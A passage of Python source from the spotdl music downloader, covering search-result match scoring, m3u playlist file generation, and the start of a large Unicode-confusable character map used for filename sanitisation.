### Arguments - song: song to match - result: result to match - score: current score ### Returns - new score """ if ( score > 70 or not result.artists or len(result.artists) > 1 or len(song.artists) == 1 ): # Don't fixup the score # if the score is already high # or if the result has more than one artist # or if the song has only one artist return score artists_score_fixup = ratio( slugify(result.name), slugify(create_song_title(song.name, [song.artist])), ) if artists_score_fixup >= 80: score = (score + artists_score_fixup) / 2 # Make sure that the score is not higher than 100 score = min(score, 100) return score def calc_name_match( song: Song, result: Result, search_query: Optional[str] = None ) -> float: """ Calculate name match percentage ### Arguments - song: song to match - result: result to match ### Returns - name match percentage """ # Create match strings that will be used # to calculate name match value match_str1, match_str2 = create_match_strings(song, result, search_query) result_name, song_name = slugify(result.name), slugify(song.name) res_list, song_list = based_sort(result_name.split("-"), song_name.split("-")) result_name, song_name = "-".join(res_list), "-".join(song_list) # Calculate initial name match name_match = ratio(result_name, song_name) debug(song.song_id, result.result_id, f"MATCH STRINGS: {match_str1} - {match_str2}") debug( song.song_id, result.result_id, f"SLUG MATCH STRINGS: {song_name} - {result_name}", ) debug(song.song_id, result.result_id, f"First name match: {name_match}") # If name match is lower than 60%, # we try to match using the test strings if name_match <= 75: second_name_match = ratio( match_str1, match_str2, ) debug( song.song_id, result.result_id, f"Second name match: {second_name_match}", ) name_match = max(name_match, second_name_match) return name_match def calc_time_match(song: Song, result: Result) -> float: """ Calculate time difference between song and result ### Arguments - song: 
song to match - result: result to match ### Returns - time difference between song and result """ time_diff = abs(song.duration - result.duration) score = exp(-0.1 * time_diff) return score * 100 def calc_album_match(song: Song, result: Result) -> float: """ Calculate album match percentage ### Arguments - song: song to match - result: result to match ### Returns - album match percentage """ if not result.album: return 0.0 return ratio(slugify(song.album_name), slugify(result.album)) def order_results( results: List[Result], song: Song, search_query: Optional[str] = None, ) -> Dict[Result, float]: """ Order results. ### Arguments - results: The results to order. - song: The song to order for. - search_query: The search query. ### Returns - The ordered results. """ # Assign an overall avg match value to each result links_with_match_value = {} # Iterate over all results for result in results: debug( song.song_id, result.result_id, f"Calculating match value for {result.url} - {result.json}", ) # skip results that have no common words in their name if not check_common_word(song, result): debug( song.song_id, result.result_id, "Skipping result due to no common words" ) continue # Calculate match value for main artist artists_match = calc_main_artist_match(song, result) debug(song.song_id, result.result_id, f"Main artist match: {artists_match}") # Calculate match value for all artists other_artists_match = calc_artists_match(song, result) debug( song.song_id, result.result_id, f"Other artists match: {other_artists_match}", ) artists_match += other_artists_match # Calculate initial artist match value debug(song.song_id, result.result_id, f"Initial artists match: {artists_match}") artists_match = artists_match / (2 if len(song.artists) > 1 else 1) debug(song.song_id, result.result_id, f"First artists match: {artists_match}") # First attempt to fix artist match artists_match = artists_match_fixup1(song, result, artists_match) debug( song.song_id, result.result_id, f"Artists match after fixup1: {artists_match}", ) # Second attempt to fix artist match artists_match = artists_match_fixup2(song, result, artists_match) debug( song.song_id, result.result_id, f"Artists match after fixup2: {artists_match}", ) # Third attempt to fix artist match artists_match = artists_match_fixup3(song, result, artists_match) debug( song.song_id, result.result_id, f"Artists match after fixup3: {artists_match}", ) debug(song.song_id, result.result_id, f"Final artists match: {artists_match}") # Calculate name match name_match = calc_name_match(song, result, search_query) debug(song.song_id, result.result_id, f"Initial name match: {name_match}") # Check if result contains forbidden words contains_fwords, found_fwords = check_forbidden_words(song, result) if contains_fwords: for _ in found_fwords: name_match -= 15 debug( song.song_id, result.result_id, f"Contains forbidden words: {contains_fwords}, {found_fwords}", ) debug(song.song_id, result.result_id, f"Final name match: {name_match}") # Calculate album match album_match = calc_album_match(song, result) debug(song.song_id, result.result_id, f"Final album match: {album_match}") # Calculate time match time_match = calc_time_match(song, result) debug(song.song_id, result.result_id, f"Final time match: {time_match}") # Ignore results with name match lower than 60% if name_match <= 60: debug( song.song_id, result.result_id, "Skipping result due to name match lower than 60%", ) continue # Ignore results with artists match lower than 70% if artists_match < 70 and result.source != 
"slider.kz": debug( song.song_id, result.result_id, "Skipping result due to artists match lower than 70%", ) continue # Calculate total match average_match = (artists_match + name_match) / 2 debug(song.song_id, result.result_id, f"Average match: {average_match}") if ( result.verified and not result.isrc_search and result.album and album_match <= 80 ): # we are almost certain that this is the correct result # so we add the album match to the average match average_match = (average_match + album_match) / 2 debug( song.song_id, result.result_id, f"Average match /w album match: {average_match}", ) # Skip results with time match lower than 25% if time_match < 25: debug( song.song_id, result.result_id, "Skipping result due to time match lower than 25%", ) continue # If the time match is lower than 50% # and the average match is lower than 75% # we skip the result if time_match < 50 and average_match < 75: debug( song.song_id, result.result_id, "Skipping result due to time match < 50% and average match < 75%", ) continue if ( (not result.isrc_search and average_match <= 85) or result.source == "slider.kz" or time_match < 0 ): # Don't add time to avg match if average match is not the best # (lower than 85%), always include time match if result is from # slider.kz or if time match is lower than 0 average_match = (average_match + time_match) / 2 debug( song.song_id, result.result_id, f"Average match /w time match: {average_match}", ) if (result.explicit is not None and song.explicit is not None) and ( result.explicit != song.explicit ): debug( song.song_id, result.result_id, "Lowering average match due to explicit mismatch", ) average_match -= 5 average_match = min(average_match, 100) debug(song.song_id, result.result_id, f"Final average match: {average_match}") # the results along with the avg Match links_with_match_value[result] = average_match return links_with_match_value File: spotdl/utils/m3u.py """ Module for creating m3u content and writing it to a file. """ from pathlib import Path from typing import Dict, List, Optional from spotdl.types.song import Song from spotdl.utils.formatter import create_file_name, sanitize_string __all__ = [ "create_m3u_content", "gen_m3u_files", "create_m3u_file", ] def create_m3u_content( song_list: List[Song], template: str, file_extension: str, restrict: Optional[str] = None, short: bool = False, detect_formats: Optional[List[str]] = None, ) -> str: """ Create m3u content and return it as a string. ### Arguments - song_list: the list of songs - template: the template to use - file_extension: the file extension to use - restrict: sanitization to apply to the filename - short: whether to use the short version of the template ### Returns - the m3u content as a string """ text = "" for song in song_list: if not detect_formats: file_name = create_file_name( song, template, file_extension, restrict, short ) text += str(file_name) + "\n" else: for file_ext in detect_formats: file_name = create_file_name(song, template, file_ext, restrict, short) if file_name.exists(): text += str(file_name) + "\n" break else: file_name = create_file_name( song, template, file_extension, restrict, short ) text += str(file_name) + "\n" return text def gen_m3u_files( songs: List[Song], file_name: Optional[str], template: str, file_extension: str, restrict: Optional[str] = None, short: bool = False, detect_formats: Optional[List[str]] = None, ): """ Create an m3u8 filename from the query. 
### Arguments - query: the query - file_name: the file name to use - song_list: the list of songs - template: the output file template to use - file_extension: the file extension to use - restrict: sanitization to apply to the filename - short: whether to use the short version of the template - detect_formats: the formats to detect """ # If no file name is provided, use the first list's name if not file_name: file_name = "{list[0]}.m3u8" # If file_name ends with a slash. Does not have a m3u8 name with extension # at the end of the template, append `{list[0]}`` to it if ( file_name.endswith("/") or file_name.endswith(r"\\") or file_name.endswith("\\\\") ): file_name += "/{list[0]}.m3u8" # Check if the file name ends with .m3u or .m3u8 if not file_name.endswith(".m3u") and not file_name.endswith(".m3u8"): file_name += ".m3u8" lists_object: Dict[str, List[Song]] = {} for song in songs: if song.list_name is None: continue if song.list_name not in lists_object: lists_object[song.list_name] = [] lists_object[song.list_name].append(song) if "{list}" in file_name: # Create multiple m3u files if there are multiple lists for list_name, song_list in lists_object.items(): create_m3u_file( file_name.format( list=list_name, ), song_list, template, file_extension, restrict, short, detect_formats, ) elif "{list[" in file_name and "]}" in file_name: # Create a single m3u file for specified song list name create_m3u_file( file_name.format(list=list(lists_object.keys())), songs, template, file_extension, restrict, short, detect_formats, ) else: # Use the provided file name create_m3u_file( file_name, songs, template, file_extension, restrict, short, detect_formats, ) def create_m3u_file( file_name: str, song_list: List[Song], template: str, file_extension: str, restrict: Optional[str] = None, short: bool = False, detect_formats: Optional[List[str]] = None, ) -> str: """ Create the m3u file. ### Arguments - file_name: the file name to use - song_list: the list of songs - template: the template to use - file_extension: the file extension to use - restrict: sanitization to apply to the filename - short: whether to use the short version of the template - detect_formats: the formats to detect ### Returns - the m3u content as a string """ m3u_content = create_m3u_content( song_list, template, file_extension, restrict, short, detect_formats, ) file_path = Path(sanitize_string(file_name)).absolute() with open(file_path, "w", encoding="utf-8") as m3u_file: m3u_file.write(m3u_content) return m3u_content File: spotdl/utils/static.py """ Module for holding static variables that are used throughout the project. And are for the most part, not likely to change. 
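For example, AMBIGUOUS_CHARACTERS maps the decimal codepoint of a visually confusable character (stored as a string key) to the codepoint of the plain-ASCII character it resembles; a minimal sketch of how such an entry can be read:

```py
>>> chr(65345)                            # FULLWIDTH LATIN SMALL LETTER A
'ａ'
>>> chr(AMBIGUOUS_CHARACTERS["65345"])
'a'
```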
(Also holds really large variables, so pylint is disabled here) """ # pylint: skip-file __all__ = [ "AMBIGUOUS_CHARACTERS", "BAD_CHARS", ] BAD_CHARS = [12441, 12442] + list(range(769, 880)) # Source: https://github.com/hediet/vscode-unicode-data/blob/main/out/ambiguous.json AMBIGUOUS_CHARACTERS = { "8232": 32, "8233": 32, "5760": 32, "8192": 32, "8193": 32, "8194": 32, "8195": 32, "8196": 32, "8197": 32, "8198": 32, "8200": 32, "8201": 32, "8202": 32, "8287": 32, "8199": 32, "8239": 32, "2042": 95, "65101": 95, "65102": 95, "65103": 95, "8208": 45, "8209": 45, "8210": 45, "65112": 45, "1748": 45, "8259": 45, "727": 45, "8722": 45, "10134": 45, "11450": 45, "1549": 44, "1643": 44, "8218": 44, "184": 44, "42233": 44, "894": 59, "2307": 58, "2691": 58, "1417": 58, "1795": 58, "1796": 58, "5868": 58, "65072": 58, "6147": 58, "6153": 58, "8282": 58, "1475": 58, "760": 58, "42889": 58, "8758": 58, "720": 58, "42237": 58, "451": 33, "11601": 33, "660": 63, "577": 63, "2429": 63, "5038": 63, "42731": 63, "119149": 46, "8228": 46, "1793": 46, "1794": 46, "42510": 46, "68176": 46, "1632": 46, "1776": 46, "42232": 46, "1373": 96, "65287": 96, "8219": 96, "8242": 96, "1370": 96, "1523": 96, "8175": 96, "65344": 96, "900": 96, "8189": 96, "8125": 96, "8127": 96, "8190": 96, "697": 96, "884": 96, "712": 96, "714": 96, "715": 96, "756": 96, "699": 96, "701": 96, "700": 96, "702": 96, "42892": 96, "1497": 96, "2036": 96, "2037": 96, "5194": 96, "5836": 96, "94033": 96, "94034": 96, "65339": 91, "10088": 40, "10098": 40, "12308": 40, "64830": 40, "65341": 93, "10089": 41, "10099": 41, "12309": 41, "64831": 41, "10100": 123, "119060": 123, "10101": 125, "65342": 94, "8270": 42, "1645": 42, "8727": 42, "66335": 42, "5941": 47, "8257": 47, "8725": 47, "8260": 47, "9585": 47, "10187": 47, "10744": 47, "119354": 47, "12755": 47, "12339": 47, "11462": 47, "20031": 47, "12035": 47, "65340": 92, "65128": 92, "8726": 92, "10189": 92, "10741": 92, "10745": 92, "119311": 92, "119355": 92, "12756": 92, "20022": 92, "12034": 92, "42872": 38, "708": 94, "710": 94, "5869": 43, "10133": 43, "66203": 43, "8249": 60, "10094": 60, "706": 60, "119350": 60, "5176": 60, "5810": 60, "5120": 61, "11840": 61, "12448": 61, "42239": 61, "8250": 62, "10095": 62, "707": 62, "119351": 62, "5171": 62, "94015": 62, "8275": 126, "732": 126, "8128": 126, "8764": 126, "65372": 124, "65293": 45, "120784": 50, "120794": 50, "120804": 50, "120814": 50, "120824": 50, "130034": 50, "42842": 50, "423": 50, "1000": 50, "42564": 50, "5311": 50, "42735": 50, "119302": 51, "120785": 51, "120795": 51, "120805": 51, "120815": 51, "120825": 51, "130035": 51, "42923": 51, "540": 51, "439": 51, "42858": 51, "11468": 51, "1248": 51, "94011": 51, "71882": 51, "120786": 52, "120796": 52, "120806": 52, "120816": 52, "120826": 52, "130036": 52, "5070": 52, "71855": 52, "120787": 53, "120797": 53, "120807": 53, "120817": 53, "120827": 53, "130037": 53, "444": 53, "71867": 53, "120788": 54, "120798": 54, "120808": 54, "120818": 54, "120828": 54, "130038": 54, "11474": 54, "5102": 54, "71893": 54, "119314": 55, "120789": 55, "120799": 55, "120809": 55, "120819": 55, "120829": 55, "130039": 55, "66770": 55, "71878": 55, "2819": 56, "2538": 56, "2666": 56, "125131": 56, "120790": 56, "120800": 56, "120810": 56, "120820": 56, "120830": 56, "130040": 56, "547": 56, "546": 56, "66330": 56, "2663": 57, "2920": 57, "2541": 57, "3437": 57, "120791": 57, "120801": 57, "120811": 57, "120821": 57, "120831": 57, "130041": 57, "42862": 57, "11466": 57, "71884": 57, "71852": 
57, "71894": 57, "9082": 97, "65345": 97, "119834": 97, "119886": 97, "119938": 97, "119990": 97, "120042": 97, "120094": 97, "120146": 97, "120198": 97, "120250": 97, "120302": 97, "120354": 97, "120406": 97, "120458": 97, "593": 97, "945": 97, "120514": 97, "120572": 97, "120630": 97, "120688": 97, "120746": 97, "65313": 65, "119808": 65, "119860": 65, "119912": 65, "119964": 65, "120016": 65, "120068": 65, "120120": 65, "120172": 65, "120224": 65, "120276": 65, "120328": 65, "120380": 65, "120432": 65, "913": 65, "120488": 65, "120546": 65, "120604": 65, "120662": 65, "120720": 65, "5034": 65, "5573": 65, "42222": 65, "94016": 65, "66208": 65, "119835": 98, "119887": 98, "119939": 98, "119991": 98, "120043": 98, "120095": 98, "120147": 98, "120199": 98, "120251": 98, "120303": 98, "120355": 98, "120407": 98, "120459": 98, "388": 98, "5071": 98, "5234": 98, "5551": 98, "65314": 66, "8492": 66, "119809": 66, "119861": 66, "119913": 66, "120017": 66, "120069": 66, "120121": 66, "120173": 66, "120225": 66, "120277": 66, "120329": 66, "120381": 66, "120433": 66, "42932": 66, "914": 66, "120489": 66, "120547": 66, "120605": 66, "120663": 66, "120721": 66, "5108": 66, "5623": 66, "42192": 66, "66178": 66, "66209": 66, "66305": 66, "65347": 99, "8573": 99, "119836": 99, "119888": 99, "119940": 99, "119992": 99, "120044": 99, "120096": 99, "120148": 99, "120200": 99, "120252": 99, "120304": 99, "120356": 99, "120408": 99, "120460": 99, "7428": 99, "1010": 99, "11429": 99, "43951": 99, "66621": 99, "128844": 67, "71922": 67, "71913": 67, "65315": 67, "8557": 67, "8450": 67, "8493": 67, "119810": 67, "119862": 67, "119914": 67, "119966": 67, "120018": 67, "120174": 67, "120226": 67, "120278": 67, "120330": 67, "120382": 67, "120434": 67, "1017": 67, "11428": 67, "5087": 67, "42202": 67, "66210": 67, "66306": 67, "66581": 67, "66844": 67, "8574": 100, "8518": 100, "119837": 100, "119889": 100, "119941": 100, "119993": 100, "120045": 100, "120097": 100, "120149": 100, "120201": 100, "120253": 100, "120305": 100, "120357": 100, "120409": 100, "120461": 100, "1281": 100, "5095": 100, "5231": 100, "42194": 100, "8558": 68, "8517": 68, "119811": 68, "119863": 68, "119915": 68, "119967": 68, "120019": 68, "120071": 68, "120123": 68, "120175": 68, "120227": 68, "120279": 68, "120331": 68, "120383": 68, "120435": 68, "5024": 68, "5598": 68, "5610": 68, "42195": 68, "8494": 101, "65349": 101, "8495": 101, "8519": 101, "119838": 101, "119890": 101, "119942": 101, "120046": 101, "120098": 101, "120150": 101, "120202": 101, "120254": 101, "120306": 101, "120358": 101, "120410": 101, "120462": 101, "43826": 101, "1213": 101, "8959": 69, "65317": 69, "8496": 69, "119812": 69, "119864": 69, "119916": 69, "120020": 69, "120072": 69, "120124": 69, "120176": 69, "120228": 69, "120280": 69, "120332": 69, "120384": 69, "120436": 69, "917": 69, "120492": 69, "120550": 69, "120608": 69, "120666": 69, "120724": 69, "11577": 69, "5036": 69, "42224": 69, "71846": 69, "71854": 69, "66182": 69, "119839": 102, "119891": 102, "119943": 102, "119995": 102, "120047": 102, "120099": 102, "120151": 102, "120203": 102, "120255": 102, "120307": 102, "120359": 102, "120411": 102, "120463": 102, "43829": 102, "42905": 102, "383": 102, "7837": 102, "1412": 102, "119315": 70, "8497": 70, "119813": 70, "119865": 70, "119917": 70, "120021": 70, "120073": 70, "120125": 70, "120177": 70, "120229": 70, "120281": 70, "120333": 70, "120385": 70, "120437": 70, "42904": 70, "988": 70, "120778": 70, "5556": 70, "42205": 70, "71874": 70, "71842": 
70, "66183": 70, "66213": 70, "66853": 70, "65351": 103, "8458": 103, "119840": 103, "119892": 103, "119944": 103, "120048": 103, "120100": 103, "120152": 103, "120204": 103, "120256": 103, "120308": 103, "120360": 103, "120412": 103, "120464": 103, "609": 103, "7555": 103, "397": 103, "1409": 103, "119814": 71, "119866": 71, "119918": 71, "119970": 71, "120022": 71, "120074": 71, "120126": 71, "120178": 71, "120230": 71, "120282": 71, "120334": 71, "120386": 71, "120438": 71, "1292": 71, "5056": 71, "5107": 71, "42198": 71, "65352": 104, "8462": 104, "119841": 104, "119945": 104, "119997": 104, "120049": 104, "120101": 104, "120153": 104, "120205": 104, "120257": 104, "120309": 104, "120361": 104, "120413": 104, "120465": 104, "1211": 104, "1392": 104, "5058": 104, "65320": 72, "8459": 72, "8460": 72, "8461": 72, "119815": 72, "119867": 72, "119919": 72, "120023": 72, "120179": 72, "120231": 72, "120283": 72, "120335": 72, "120387": 72, "120439": 72, "919": 72, "120494": 72, "120552": 72, "120610": 72, "120668": 72, "120726": 72, "11406": 72, "5051": 72, "5500": 72, "42215": 72, "66255": 72, "731": 105, "9075": 105, "65353": 105, "8560": 105, "8505": 105, "8520": 105, "119842": 105, "119894": 105, "119946": 105, "119998": 105, "120050": 105, "120102": 105, "120154": 105, "120206": 105, "120258": 105, "120310": 105, "120362": 105, "120414": 105, "120466": 105, "120484": 105, "618": 105, "617": 105, "953": 105, "8126": 105, "890": 105, "120522": 105, "120580": 105, "120638": 105, "120696": 105, "120754": 105, "1110": 105, "42567": 105, "1231": 105, "43893": 105, "5029": 105, "71875": 105, "65354": 106, "8521": 106, "119843": 106, "119895": 106, "119947": 106, "119999": 106, "120051": 106, "120103": 106, "120155": 106, "120207": 106, "120259": 106, "120311": 106, "120363": 106, "120415": 106, "120467": 106, "1011": 106, "1112": 106, "65322": 74, "119817": 74, "119869": 74, "119921": 74, "119973": 74, "120025": 74, "120077": 74, "120129": 74, "120181": 74, "120233": 74, "120285": 74, "120337": 74, "120389": 74, "120441": 74, "42930": 74, "895": 74, "1032": 74, "5035": 74, "5261": 74, "42201": 74, "119844": 107, "119896": 107, "119948": 107, "120000": 107, "120052": 107, "120104": 107, "120156": 107, "120208": 107, "120260": 107, "120312": 107, "120364": 107, "120416": 107, "120468": 107, "8490": 75, "65323": 75, "119818": 75, "119870": 75, "119922": 75, "119974": 75, "120026": 75, "120078": 75, "120130": 75, "120182": 75, "120234": 75, "120286": 75, "120338": 75, "120390": 75, "120442": 75, "922": 75, "120497": 75, "120555": 75, "120613": 75, "120671": 75, "120729": 75, "11412": 75, "5094": 75, "5845": 75, "42199": 75, "66840": 75, "1472": 108, "8739": 73, "9213": 73, "65512": 73, "1633": 108, "1777": 73, "66336": 108, "125127": 108, "120783": 73, "120793": 73, "120803": 73, "120813": 73, "120823": 73, "130033": 73, "65321": 73, "8544": 73, "8464": 73, "8465": 73, "119816": 73, "119868": 73, "119920": 73, "120024": 73, "120128": 73, "120180": 73, "120232": 73, "120284": 73, "120336": 73, "120388": 73, "120440": 73, "65356": 108, "8572": 73, "8467": 108, "119845": 108, "119897": 108, "119949": 108, "120001": 108, "120053": 108, "120105": 73, "120157": 73, "120209": 73, "120261": 73, "120313": 73, "120365": 73, "120417": 73, "120469": 73, "448": 73, "120496": 73, "120554": 73, "120612": 73, "120670": 73, "120728": 73, "11410": 73, "1030": 73, "1216": 73, "1493": 108, "1503": 108, "1575": 108, "126464": 108, "126592": 108, "65166": 108, "65165": 108, "1994": 108, "11599": 73, "5825": 73, 
"42226": 73, "93992": 73, "66186": 124, "66313": 124, "119338": 76, "8556": 76, "8466": 76, "119819": 76, "119871": 76, "119923": 76, "120027": 76, "120079": 76, "120131": 76, "120183": 76, "120235": 76, "120287": 76, "120339": 76, "120391": 76, "120443": 76, "11472": 76, "5086": 76, "5290": 76, "42209": 76, "93974": 76, "71843": 76, "71858": 76, "66587": 76, "66854": 76, "65325": 77, "8559": 77, "8499": 77, "119820": 77, "119872": 77, "119924": 77, "120028": 77, "120080": 77, "120132": 77, "120184": 77, "120236": 77, "120288": 77, "120340": 77, "120392": 77, "120444": 77, "924": 77, "120499": 77, "120557": 77, "120615": 77, "120673": 77, "120731": 77, "1018": 77, "11416": 77, "5047": 77, "5616": 77, "5846": 77, "42207": 77, "66224": 77, "66321": 77, "119847": 110, "119899": 110, "119951": 110, "120003": 110, "120055": 110, "120107": 110, "120159": 110, "120211": 110, "120263": 110, "120315": 110, "120367": 110, "120419": 110, "120471": 110, "1400": 110, "1404": 110, "65326": 78, "8469": 78, "119821": 78, "119873": 78, "119925": 78, "119977": 78, "120029": 78, "120081": 78, "120185": 78, "120237": 78, "120289": 78, "120341": 78, "120393": 78, "120445": 78, "925": 78, "120500": 78, "120558": 78, "120616": 78, "120674": 78, "120732": 78, "11418": 78, "42208": 78, "66835": 78, "3074": 111, "3202": 111, "3330": 111, "3458": 111, "2406": 111, "2662": 111, "2790": 111, "3046": 111, "3174": 111, "3302": 111, "3430": 111, "3664": 111, "3792": 111, "4160": 111, "1637": 111, "1781": 111, "65359": 111, "8500": 111, "119848": 111, "119900": 111, "119952": 111, "120056": 111, "120108": 111, "120160": 111, "120212": 111, "120264": 111, "120316": 111, "120368": 111, "120420": 111, "120472": 111, "7439": 111, "7441": 111, "43837": 111, "959": 111, "120528": 111, "120586": 111, "120644": 111, "120702": 111, "120760": 111, "963": 111, "120532": 111, "120590": 111, "120648": 111, "120706": 111, "120764": 111, "11423": 111, "4351": 111, "1413": 111, "1505": 111, "1607": 111, "126500": 111, "126564": 111, "126596": 111, "65259": 111, "65260": 111, "65258": 111, "65257": 111, "1726": 111, "64428": 111, "64429": 111, "64427": 111, "64426": 111, "1729": 111, "64424": 111, "64425": 111, "64423": 111, "64422": 111, "1749": 111, "3360": 111, "4125": 111, "66794": 111, "71880": 111, "71895": 111, "66604": 111, "1984": 79, "2534": 79, "2918": 79, "12295": 79, "70864": 79, "71904": 79, "120782": 79, "120792": 79, "120802": 79, "120812": 79, "120822": 79, "130032": 79, "65327": 79, "119822": 79, "119874": 79, "119926": 79, "119978": 79, "120030": 79, "120082": 79, "120134": 79, "120186": 79, "120238": 79, "120290": 79, "120342": 79, "120394": 79, "120446": 79, "927": 79, "120502": 79, "120560": 79, "120618": 79, "120676": 79, "120734": 79, "11422": 79, "1365": 79, "11604": 79, "4816": 79, "2848": 79, "66754": 79, "42227": 79, "71861": 79, "66194": 79, "66219": 79, "66564": 79, "66838": 79, "9076": 112, "65360": 112, "119849": 112, "119901": 112, "119953": 112, "120005": 112, "120057": 112, "120109": 112, "120161": 112, "120213": 112, "120265": 112, "120317": 112, "120369": 112, "120421": 112, "120473": 112, "961": 112, "120530": 112, "120544": 112, "120588": 112, "120602": 112, "120646": 112, "120660": 112, "120704": 112, "120718": 112, "120762": 112, "120776": 112, "11427": 112, "65328": 80, "8473": 80, "119823": 80, "119875": 80, "119927": 80, "119979": 80, "120031": 80, "120083": 80, "120187": 80, "120239": 80, "120291": 80, "120343": 80, "120395": 80, "120447": 80, "929": 80, "120504": 80, "120562": 80, "120620": 
80, "120678": 80, "120736": 80, "11426": 80, "5090": 80, "5229": 80, "42193": 80, "66197": 80, "119850": 113, "119902": 113, "119954": 113, "120006": 113, "120058": 113, "120110": 113, "120162": 113, "120214": 113, "120266": 113, "120318": 113, "120370": 113, "120422": 113, "120474": 113, "1307": 113, "1379": 113, "1382": 113, "8474": 81, "119824": 81, "119876": 81, "119928": 81, "119980": 81, "120032": 81, "120084": 81, "120188": 81, "120240": 81, "120292": 81, "120344": 81, "120396": 81, "120448": 81, "11605": 81, "119851": 114, "119903": 114, "119955": 114, "120007": 114, "120059": 114, "120111": 114, "120163": 114, "120215": 114, "120267": 114, "120319": 114, "120371": 114, "120423": 114, "120475": 114, "43847": 114, "43848": 114, "7462": 114, "11397": 114, "43905": 114, "119318": 82, "8475": 82, "8476": 82, "8477": 82, "119825": 82, "119877": 82, "119929": 82, "120033": 82, "120189": 82, "120241": 82, "120293": 82, "120345": 82, "120397": 82, "120449": 82, "422": 82, "5025": 82, "5074": 82, "66740": 82, "5511": 82, "42211": 82, "94005": 82, "65363": 115, "119852": 115, "119904": 115, "119956": 115, "120008": 115, "120060": 115, "120112": 115, "120164": 115, "120216": 115, "120268": 115, "120320": 115, "120372": 115, "120424": 115, "120476": 115, "42801": 115, "445": 115, "1109": 115, "43946": 115, "71873": 115, "66632": 115, "65331": 83, "119826": 83, "119878": 83, "119930": 83, "119982": 83, "120034": 83, "120086": 83, "120138": 83, "120190": 83, "120242": 83, "120294": 83, "120346": 83, "120398": 83, "120450": 83, "1029": 83, "1359": 83, "5077": 83, "5082": 83, "42210": 83, "94010": 83, "66198": 83, "66592": 83, "119853": 116, "119905": 116, "119957": 116, "120009": 116, "120061": 116, "120113": 116, "120165": 116, "120217": 116, "120269": 116, "120321": 116, "120373": 116, "120425": 116, "120477": 116, "8868": 84, "10201": 84, "128872": 84, "65332": 84, "119827": 84, "119879": 84, "119931": 84, "119983": 84, "120035": 84, "120087": 84, "120139": 84, "120191": 84, "120243": 84, "120295": 84, "120347": 84, "120399": 84, "120451": 84, "932": 84, "120507": 84, "120565": 84, "120623": 84, "120681": 84, "120739": 84, "11430": 84, "5026": 84, "42196": 84, "93962": 84, "71868": 84, "66199": 84, "66225": 84, "66325": 84, "119854": 117, "119906": 117, "119958": 117, "120010": 117, "120062": 117, "120114": 117, "120166": 117, "120218": 117, "120270": 117, "120322": 117, "120374": 117, "120426": 117, "120478": 117, "42911": 117, "7452": 117, "43854": 117, "43858": 117, "651": 117, "965": 117, "120534": 117, "120592": 117, "120650": 117, "120708": 117, "120766": 117, "1405": 117, "66806": 117, "71896": 117, "8746": 85, "8899": 85, "119828": 85, "119880": 85, "119932": 85, "119984": 85, "120036": 85, "120088": 85, "120140": 85, "120192": 85, "120244": 85, "120296": 85, "120348": 85, "120400": 85, "120452": 85, "1357": 85, "4608": 85, "66766": 85, "5196": 85, "42228": 85, "94018": 85, "71864": 85, "8744": 118, "8897": 118, "65366": 118, "8564": 118, "119855": 118, "119907": 118, "119959": 118, "120011": 118, "120063": 118, "120115": 118, "120167": 118, "120219": 118, "120271": 118, "120323": 118, "120375": 118, "120427": 118, "120479": 118, "7456": 118, "957": 118, "120526": 118, "120584": 118, "120642": 118, "120700": 118, "120758": 118, "1141": 118, "1496": 118, "71430": 118, "43945": 118, "71872": 118, "119309": 86, "1639": 86, "1783": 86, "8548": 86, "119829": 86, "119881": 86, "119933": 86, "119985": 86, "120037": 86, "120089": 86, "120141": 86, "120193": 86, "120245": 86, "120297": 86, 
"120349": 86, "120401": 86, "120453": 86, "1140": 86, "11576": 86, "5081": 86, "5167": 86, "42719": 86, "42214": 86, "93960": 86, "71840": 86, "66845": 86, "623": 119, "119856": 119, "119908": 119, "119960": 119, "120012": 119, "120064": 119, "120116": 119, "120168": 119, "120220": 119, "120272": 119, "120324": 119, "120376": 119, "120428": 119, "120480": 119, "7457": 119, "1121": 119, "1309": 119, "1377": 119, "71434": 119, "71438": 119, "71439": 119, "43907": 119, "71919": 87, "71910": 87, "119830": 87, "119882": 87, "119934": 87, "119986": 87, "120038": 87, "120090": 87, "120142": 87, "120194": 87, "120246": 87, "120298": 87, "120350": 87, "120402": 87, "120454": 87, "1308": 87, "5043": 87, "5076": 87, "42218": 87, "5742": 120, "10539": 120, "10540": 120, "10799": 120, "65368": 120, "8569": 120, "119857": 120, "119909": 120, "119961": 120, "120013": 120, "120065": 120, "120117": 120, "120169": 120, "120221": 120, "120273": 120, "120325": 120, "120377": 120, "120429": 120, "120481": 120, "5441": 120, "5501": 120, "5741": 88, "9587": 88, "66338": 88, "71916": 88, "65336": 88, "8553": 88, "119831": 88, "119883": 88, "119935": 88, "119987": 88, "120039": 88, "120091": 88, "120143": 88, "120195": 88, "120247": 88, "120299": 88, "120351": 88, "120403": 88, "120455": 88, "42931": 88, "935": 88, "120510": 88, "120568": 88, "120626": 88, "120684": 88, "120742": 88, "11436": 88, "11613": 88, "5815": 88, "42219": 88, "66192": 88, "66228": 88, "66327": 88, "66855": 88, "611": 121, "7564": 121, "65369": 121, "119858": 121, "119910": 121, "119962": 121, "120014": 121, "120066": 121, "120118": 121, "120170": 121, "120222": 121, "120274": 121, "120326": 121, "120378": 121, "120430": 121, "120482": 121, "655": 121, "7935": 121, "43866": 121, "947": 121, "8509": 121, "120516": 121, "120574": 121, "120632": 121, "120690": 121, "120748": 121, "1199": 121, "4327": 121, "71900": 121, "65337": 89, "119832": 89, "119884": 89, "119936": 89, "119988": 89, "120040": 89, "120092": 89, "120144": 89, "120196": 89, "120248": 89, "120300": 89, "120352": 89, "120404": 89, "120456": 89, "933": 89, "978": 89, "120508": 89, "120566": 89, "120624": 89, "120682": 89, "120740": 89, "11432": 89, "1198": 89, "5033": 89, "5053": 89, "42220": 89, "94019": 89, "71844": 89, "66226": 89, "119859": 122, "119911": 122, "119963": 122, "120015": 122, "120067": 122, "120119": 122, "120171": 122, "120223": 122, "120275": 122, "120327": 122, "120379": 122, "120431": 122, "120483": 122, "7458": 122, "43923": 122, "71876": 122, "66293": 90, "71909": 90, "65338": 90, "8484": 90, "8488": 90, "119833": 90, "119885": 90, "119937": 90, "119989": 90, "120041": 90, "120197": 90, "120249": 90, "120301": 90, "120353": 90, "120405": 90, "120457": 90, "918": 90, "120493": 90, "120551": 90, "120609": 90, "120667": 90, "120725": 90, "5059": 90, "42204": 90, "71849": 90, "65282": 34, "65284": 36, "65285": 37, "65286": 38, "65290": 42, "65291": 43, "65294": 46, "65295": 47, "65296": 48, "65297": 49, "65298": 50, "65299": 51, "65300": 52, "65301": 53, "65302": 54, "65303": 55, "65304": 56, "65305": 57, "65308": 60, "65309": 61, "65310": 62, "65312": 64, "65316": 68, "65318": 70, "65319": 71, "65324": 76, 